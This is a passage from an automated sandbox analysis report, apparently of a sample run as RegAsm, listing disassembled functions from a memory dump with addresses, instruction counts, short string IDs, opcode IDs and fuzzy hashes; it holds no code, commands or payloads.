                                        • Instruction Fuzzy Hash: 9CC124B16083008BDB149F28DC927ABB3E1FF95314F094A2DE582C7391E7B8E945C399
                                        Function 0042BFD3 Relevance: 1.7, Strings: 1, Instructions: 456COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x
                                        • API String ID: 0-2363233923
                                        • Opcode ID: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                        • Instruction ID: cbfe56490d4610b99627c39bd120223bdbde8b4c29662e55905f397c0fd00549
                                        • Opcode Fuzzy Hash: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                        • Instruction Fuzzy Hash: 1AD1176060C7E18ED7358B2894903BFBBD1AF97344F5849AED0D54B382D739940AC797
                                        Function 004266E7 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: &tB
                                        • API String ID: 0-268467982
                                        • Opcode ID: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                        • Instruction ID: 06a34f82c29db43340e48ad1cbe7e395302b1ddd3c50ea808075b5b9ec83bf05
                                        • Opcode Fuzzy Hash: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                        • Instruction Fuzzy Hash: C5E169B5A083618FC7109F14E45136BB7E1AFDA304F0A486EE8C597342D639ED45CB9B
                                        Function 0042297F Relevance: 1.7, Strings: 1, Instructions: 408COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: cba`
                                        • API String ID: 0-1926275841
                                        • Opcode ID: c94db94e7765f3a71b808c63476c00684dbe44ed22f50a4180e2a827f6d9ca56
                                        • Instruction ID: 193fac06bddc95f6f71a2cfced3675609a912480cc88b1c4448270c4c5f8e929
                                        • Opcode Fuzzy Hash: c94db94e7765f3a71b808c63476c00684dbe44ed22f50a4180e2a827f6d9ca56
                                        • Instruction Fuzzy Hash: BEC146756083209FC314CF29E89162BBBE2FFCA711F59866DE8924B391C7799D01CB85
                                        Function 0042A630 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "
                                        • API String ID: 0-123907689
                                        • Opcode ID: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                        • Instruction ID: f813c1fc85afd7223dda0e36a8c027de47e21e6ca96e88e37e758e8b14c45e64
                                        • Opcode Fuzzy Hash: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                        • Instruction Fuzzy Hash: 03C113B2B043215BD7149E25E44076BB7E5AF84310F59892FEC9687382E738DC59C78B
                                        Function 0043E690 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: @CDE
                                        • API String ID: 2994545307-1513065382
                                        • Opcode ID: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                        • Instruction ID: 3c5ac0be7424b57116813a4f2293c38aabf5a2246835f37d4781b8179357b19c
                                        • Opcode Fuzzy Hash: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                        • Instruction Fuzzy Hash: EFB146717493414BC318DB2AC8D1A3BBBE6ABE9314F1CD93DE58687392C638DC058796
                                        Function 00417190 Relevance: 1.6, Strings: 1, Instructions: 375COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RuA
                                        • API String ID: 0-3286949753
                                        • Opcode ID: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                        • Instruction ID: 812d55878a62f6fab66defe66c88ae53172d99736bf38563795d352ae53827f1
                                        • Opcode Fuzzy Hash: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                        • Instruction Fuzzy Hash: 8CB10234208701CFE7258F29D851B73B7F2EB4A711F1489ADD4968B392D738A882CB58
                                        Function 00426EBE Relevance: 1.6, Strings: 1, Instructions: 350COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: oB
                                        • API String ID: 0-2659631944
                                        • Opcode ID: 0693cc6c46902c7217c4adacdc2c5168b01ac46d7e5509cb09b59ea090d7e90c
                                        • Instruction ID: 9f556a8ac2aeb4471154cd87b74293f5bbb160a2dea8f59859fea2c9b9bc59b4
                                        • Opcode Fuzzy Hash: 0693cc6c46902c7217c4adacdc2c5168b01ac46d7e5509cb09b59ea090d7e90c
                                        • Instruction Fuzzy Hash: 54C11431A08391CFD314CF38A89076ABBA2AF8A314F5947ADF4A55B3E1D3359D04CB59
                                        Function 00421EE0 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x%
                                        • API String ID: 0-3980080454
                                        • Opcode ID: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                        • Instruction ID: 53925fe815e81de9676dfe4c3668865c11de61aed011eb2c10e86570e61a59d5
                                        • Opcode Fuzzy Hash: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                        • Instruction Fuzzy Hash: 7BA145B1604320ABCB10DF24DC91B6777E4FF94358F08492DEA858B391E7B9E905C766
                                        Function 00434C4D Relevance: 1.6, Strings: 1, Instructions: 311COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: cba`
                                        • API String ID: 0-1926275841
                                        • Opcode ID: 6e56f68504aedb9c4637ddc64e974fdb85d88a5ec5eac0ceed752bd9f5295936
                                        • Instruction ID: 94ad105f6478fdac957072c6e69bbed76807f6ec97b14cb59ee989f6f6ee26f8
                                        • Opcode Fuzzy Hash: 6e56f68504aedb9c4637ddc64e974fdb85d88a5ec5eac0ceed752bd9f5295936
                                        • Instruction Fuzzy Hash: 7FE1E421508BD18ED336CA3C8804357BFE15B6B314F09CB9DC4EA5B7D2C669A905C7A6
                                        Function 0041CB5A Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ^@
                                        • API String ID: 0-1015691136
                                        • Opcode ID: 703dd625fb3eb8638aa44194967a27a36d87c0cb45f6d60d58a93a7552ea481a
                                        • Instruction ID: 235d2d97adcff596e282d77143eaa9e06c0732ed9a934443ad0122243597bde8
                                        • Opcode Fuzzy Hash: 703dd625fb3eb8638aa44194967a27a36d87c0cb45f6d60d58a93a7552ea481a
                                        • Instruction Fuzzy Hash: AE71CCB66883108BC324CF59C89226BF7F2FFD5714F09981DE8D99B350E3788901879A
                                        Function 004301D0 Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 0a169f153f05d81556b97ec1d982402f44b1193e7a5d9548232ad9bc2a2d11b7
                                        • Instruction ID: b52eb51231fc900eaadc8c81f457622f3f0b6f51af79dcbe8e0f809c0597da3a
                                        • Opcode Fuzzy Hash: 0a169f153f05d81556b97ec1d982402f44b1193e7a5d9548232ad9bc2a2d11b7
                                        • Instruction Fuzzy Hash: 98912733658A9007C72C5D7C4C752AABA934BDA230F2E937EA9B2CB3E1D52988065355
                                        Function 0041D420 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ~
                                        • API String ID: 0-1707062198
                                        • Opcode ID: 72c13701696192dfc20109577999103ecfce46bb15957d77df2543678485ee00
                                        • Instruction ID: fedad1c06f0065ecafef613c73bdfc631541caa38951d67b42794b4cc961db47
                                        • Opcode Fuzzy Hash: 72c13701696192dfc20109577999103ecfce46bb15957d77df2543678485ee00
                                        • Instruction Fuzzy Hash: 218139B29042615FC7258E28C84179BBBD1AB85324F19C23EECB99B392D6389C46D7D1
                                        Function 00405E60 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,
                                        • API String ID: 0-3772416878
                                        • Opcode ID: 7fae2f255a8fd2d56763f8beb58fcdc8fb186e5576eac22f9c3d66becbf538f0
                                        • Instruction ID: a3ef299c5e7e977cc5b7504a12919924ad54ea5109b9e3e5b2e920edd53b1c89
                                        • Opcode Fuzzy Hash: 7fae2f255a8fd2d56763f8beb58fcdc8fb186e5576eac22f9c3d66becbf538f0
                                        • Instruction Fuzzy Hash: 34B138711097819FD325CF18C88061BFBE0AFA9704F444A2EF5D997782D635EA18CBA7
                                        Function 0043A030 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: cba`
                                        • API String ID: 2994545307-1926275841
                                        • Opcode ID: 4dd138133c70bccffe0cc9a23b0a33065d47b40352575896815e93fde00f8469
                                        • Instruction ID: 41ff4bfae8fb92d3e53a90846de56666ce7534d916a86ba38ef6454eea79fcdf
                                        • Opcode Fuzzy Hash: 4dd138133c70bccffe0cc9a23b0a33065d47b40352575896815e93fde00f8469
                                        • Instruction Fuzzy Hash: 3A717435A483009FDB189F28C890B3BB7A2EB99314F19557ED4D3877A1D6359C10CB8B
                                        Function 0042A100 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "
                                        • API String ID: 0-123907689
                                        • Opcode ID: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
                                        • Instruction ID: d68b1a9088298affc1ec5bd7052a8a4f753d8ac7f88c6c36173fe7236f557df2
                                        • Opcode Fuzzy Hash: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
                                        • Instruction Fuzzy Hash: A271E7327087254BD724D96DAC8022BB6C35BC6330F59876AECB48B3E5D6788C25478B
                                        Function 0042AAD0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "
                                        • API String ID: 0-123907689
                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                        • Instruction ID: 1b0d155936ea343f35509df964668f6b6c6c9246b28269455b7de3af52c0cfb1
                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                        • Instruction Fuzzy Hash: D271E632B183254BD714CE28E58031BBBE3ABC5710F99856EE9949B391D238EC55C78B
                                        Function 00417E82 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: tuv
                                        • API String ID: 0-2475268160
                                        • Opcode ID: 832319e91b6d4892eeb44864a439925f3f6d3c4679f0fc0c8248a51ed8917232
                                        • Instruction ID: 96cc1be5c7b42f4822ccf6fdabcc1d0a1cf8542e79077bfe6f2257edbdd6f4ef
                                        • Opcode Fuzzy Hash: 832319e91b6d4892eeb44864a439925f3f6d3c4679f0fc0c8248a51ed8917232
                                        • Instruction Fuzzy Hash: 2B6133B6604700CFC7208F24D8923A3B3F2FF96318F18456EE996477A1E739A945C759
                                        Function 00416571 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: geA
                                        • API String ID: 2994545307-2877876819
                                        • Opcode ID: 0ed91a1389df4b0d1597c695a4cf1e86b50c493ccd7e372dad384ac748f0d08a
                                        • Instruction ID: 4108c2f34951b7525a129208e7cca88797c90dd01fa32db8498efb649337b20a
                                        • Opcode Fuzzy Hash: 0ed91a1389df4b0d1597c695a4cf1e86b50c493ccd7e372dad384ac748f0d08a
                                        • Instruction Fuzzy Hash: E251BB382057009FE7258F15D891B7377A3FBA5304F1A95BED9964B7A2C378EC818B18
                                        Function 004156D0 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: gfff
                                        • API String ID: 0-1553575800
                                        • Opcode ID: 8248bf5bba180cae314aa3b7782ac89fbaa7f630bd2b14a9a196c8932c7ed6be
                                        • Instruction ID: 0bba36978a619e9ace30c92abe038fd16205fb4e8e7e125fe9cc28a2c01b1cf5
                                        • Opcode Fuzzy Hash: 8248bf5bba180cae314aa3b7782ac89fbaa7f630bd2b14a9a196c8932c7ed6be
                                        • Instruction Fuzzy Hash: 2171E675600B01CFE725CF29C891BA7B7E2FB85314F18866ED496CB395DB38A841CB85
                                        Function 0042BA8D Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `pd-
                                        • API String ID: 0-182301337
                                        • Opcode ID: 47f7bfaf72026e9969934b5e11cdcc6e3b8d9cbf3a8d33e766c69dc0c14565ff
                                        • Instruction ID: 78c49deb105515400a20ed237f8c3f66f9dc959da60051c669d51e2c98e4fb21
                                        • Opcode Fuzzy Hash: 47f7bfaf72026e9969934b5e11cdcc6e3b8d9cbf3a8d33e766c69dc0c14565ff
                                        • Instruction Fuzzy Hash: 2451F1313083914ED7358F2698507ABBBE2AFE3314F98495DC4C48B352CB78440ACB97
                                        Function 00423D30 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "=B
                                        • API String ID: 0-917644190
                                        • Opcode ID: 73ee633447d1f6527620aa035fe6b16ff7cfc22686ac84a0026da8caab8e01c4
                                        • Instruction ID: 70b728ef6d1fc5c2b8b8217b551a53d6a46a102b77591c7a10914c981e2bb08e
                                        • Opcode Fuzzy Hash: 73ee633447d1f6527620aa035fe6b16ff7cfc22686ac84a0026da8caab8e01c4
                                        • Instruction Fuzzy Hash: 8C5146766083409FE324CF55EC41B8BBBE5EBC9318F01093DF9989B281D77499458B86
                                        Function 00423E30 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "=B
                                        • API String ID: 0-917644190
                                        • Opcode ID: 87923f1b82e6d903aa9b4cb5920547b117a2f3132df7c57e5b2419fbd84656b7
                                        • Instruction ID: 73ac25a76f381af8135e2a387910311b2f1a205358cbb29a076b9eb775738f57
                                        • Opcode Fuzzy Hash: 87923f1b82e6d903aa9b4cb5920547b117a2f3132df7c57e5b2419fbd84656b7
                                        • Instruction Fuzzy Hash: 6E5123766083009FD320CF68EC41B5BBBE5EBC9318F05493DF998A7291D7B5A944CB86
                                        Function 00425F7D Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 1_B
                                        • API String ID: 0-2132359058
                                        • Opcode ID: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                        • Instruction ID: 5b09de0f708086b2db089408e795921656c95d083517461b5049a84f32a7c51a
                                        • Opcode Fuzzy Hash: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                        • Instruction Fuzzy Hash: D8415972D09B7487C230DA64A81017BB6D5DB85310F9A847FF9C697342EB38AD01A7CA
                                        Function 0042B4BB Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CUUI
                                        • API String ID: 0-173970609
                                        • Opcode ID: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                        • Instruction ID: 633f9cfe08b78efd1148aada0c0c4a0bea52aba14bf5254293374e99ea80dff2
                                        • Opcode Fuzzy Hash: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                        • Instruction Fuzzy Hash: 9541E7A020C7E08ADB358F2594903ABBBE1DFD3304F5884ADC6C56B243C77988068B5A
                                        Function 0043DBD0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: @
                                        • API String ID: 2994545307-2766056989
                                        • Opcode ID: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                        • Instruction ID: 1421818bc4f15c0d032df179158ed2797c8d4970c2420d5e39c05150b2e3af5d
                                        • Opcode Fuzzy Hash: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                        • Instruction Fuzzy Hash: C33100B15183048BC314DF18E8C162BBBF8FB9A314F15A92DE68687391D3759908CB9A
                                        Function 00425230 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: cba`
                                        • API String ID: 2994545307-1926275841
                                        • Opcode ID: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                        • Instruction ID: beb69707a00ddb1e0f288a180930159145dfafadf277c1aff9f3426dfcb85bde
                                        • Opcode Fuzzy Hash: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                        • Instruction Fuzzy Hash: 47113536A44B204BC324CE289DC163777E1AB95314F95263DDCA9D33A1E278EC009AD9
                                        Function 00410FD6 Relevance: .9, Instructions: 882COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2093543fb022584d977dfc9d50ca098b55c829935c8d8b3e8abbd63342e29df
                                        • Instruction ID: 4dc62bf772fc277d12a1bce7bd5d1620b66fc78fd85d4c56ed750eab30f1286c
                                        • Opcode Fuzzy Hash: d2093543fb022584d977dfc9d50ca098b55c829935c8d8b3e8abbd63342e29df
                                        • Instruction Fuzzy Hash: 1C720675604B408FD714DF38C58539ABBE1AF95314F098A3ED9EB877D2E638A445CB02
                                        Function 00402EA0 Relevance: .7, Instructions: 675COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8802ac95f26bb5af3ecf3f7a2b500b8189bbcbbf06de9955977d9ebab7cb66b1
                                        • Instruction ID: edd93262c37b58514c164f54ade4d824c10fc5bc9ac2c1e3e29676a09bcbb007
                                        • Opcode Fuzzy Hash: 8802ac95f26bb5af3ecf3f7a2b500b8189bbcbbf06de9955977d9ebab7cb66b1
                                        • Instruction Fuzzy Hash: 3452F2715083458FCB15CF14C0906AABFE1BF89309F19897EF8996B381D778E949CB89
                                        Function 00406690 Relevance: .7, Instructions: 665COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55742de4044c27391ea92b1462ef5243d561474e095cc6f8668b73f9f426c153
                                        • Instruction ID: 6437c18af3090e7d1f8450d5b6d6604a09e5e8e249e1d84bd2a5865c6d55a9b7
                                        • Opcode Fuzzy Hash: 55742de4044c27391ea92b1462ef5243d561474e095cc6f8668b73f9f426c153
                                        • Instruction Fuzzy Hash: E952D170A08B848FE730DF24C4843A7BBE1AB51314F15893ED5E716BC2C37DA995871A
                                        Function 0041EF30 Relevance: .6, Instructions: 647COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d4bbca7605c98e1b6c9e6aef409a34f692d1b492f4abcb5f515763d830ea422
                                        • Instruction ID: 997a0c5a4a6b9d14cc3762cd8dc21844e49b77d9c632dc490a8703620003f9aa
                                        • Opcode Fuzzy Hash: 0d4bbca7605c98e1b6c9e6aef409a34f692d1b492f4abcb5f515763d830ea422
                                        • Instruction Fuzzy Hash: CF626AB0608B808ED366CF3C8845797BFE5AB5A314F044A5EE0EF97392C7766501CB66
                                        Function 00407470 Relevance: .6, Instructions: 625COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                        • Instruction ID: af49202ca076376fa415bca2a3091a328854806cafe53c7e33487b358e5641c5
                                        • Opcode Fuzzy Hash: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                        • Instruction Fuzzy Hash: 9722B332A087118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B851CB47
                                        Function 00411B1B Relevance: .6, Instructions: 612COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8100fdb123d3d67b19287db521d51e445f5757672122b2ae3053109a734df6eb
                                        • Instruction ID: 2867989e2e87d2432c5fc8213db3c9c19056031c0356c708892e03b139116c05
